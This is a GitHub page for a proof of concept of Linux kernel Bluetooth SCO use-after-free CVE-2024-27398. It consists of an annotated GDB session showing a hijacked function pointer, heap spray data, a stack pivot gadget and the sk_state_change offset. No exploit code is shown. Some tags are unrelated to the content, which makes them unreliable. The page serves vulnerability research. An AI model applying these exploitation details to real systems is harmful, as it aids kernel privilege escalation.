secunnix/CVE-2024-27398

GitHub: secunnix/CVE-2024-27398

Proof-of-concept code for the use-after-free race condition in the Linux kernel Bluetooth SCO subsystem (CVE-2024-27398); it hijacks a function pointer via heap spraying to achieve local privilege escalation.

Stars: 6 | Forks: 0

# CVE-2024-27398

CVE-2024-27398 POC

## 📍 GDB Breakpoint

```
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) file vmlinxsef680
Reading symbols from vmlinxsef680...
(gdb) target remote :1234
Remote debugging using :1234

Thread 4 (kworker/0:1):
#0  0xdeadbeefcafebabe in ?? ()                        ← RIP = spray payload
#1  0xffffffff81019fc0 in xchg_eax_esp_ret ()          ← stack pivot gadget
#2  0xffffffff840e0134 in sco_sock_timeout+0x134 ()    ← sk->sk_state_change(sk) call site

(gdb) info registers
rax            0xdeadbeefcafebabe    ← sk_state_change value read from the spray
rbx            0xffff88810ab8f000    ← freed+sprayed sock address (sk)
rcx            0xffffffff812ec563
rdx            0x1ffff11021571e94
rsi            0x00000000fffffe00
rdi            0xffff88810ab8f000    ← sk (1st argument = sock pointer)
rsp            0xffff8881002cfcb8    ← kernel stack (before pivot)
rip            0xdeadbeefcafebabe    ← CONTROLLED RIP!

(gdb) x/8gx $rdi
0xffff88810ab8f000: 0xdeadbeefcafebabe 0xdeadbeefcafebabe    ← spray data
0xffff88810ab8f010: 0xdeadbeefcafebabe 0xdeadbeefcafebabe
0xffff88810ab8f020: 0xdeadbeefcafebabe 0xdeadbeefcafebabe

(gdb) x/gx $rdi+0x2a0
0xffff88810ab8f2a0: 0xdeadbeefcafebabe    ← sk_state_change = spray payload

(gdb) bt
#0  0xdeadbeefcafebabe in ?? ()
#1  __x86_indirect_thunk_array+0xa () at retpoline
#2  sco_sock_timeout+0x134 () at net/bluetooth/sco.c:98
#3  process_one_work+0x7cb () at kernel/workqueue.c
#4  worker_thread+0x867 () at kernel/workqueue.c
#5  kthread+0x2bf () at kernel/kthread.c
```

## References

- https://github.com/qiutianshu/sco-race-condition
- https://www.openwall.com/lists/oss-security/2024/11/29/1
Tags: CVE-2024-27398, EXP, GDB, Linux kernel, POC, ROP, sk_state_change, UAF, web report viewer, binary analysis, cloud security operations, kernel privilege escalation, heap spraying, penetration testing, client-side encryption, stack pivoting, vulnerability reproduction, network security, Bluetooth, debugging, use-after-free, privacy protection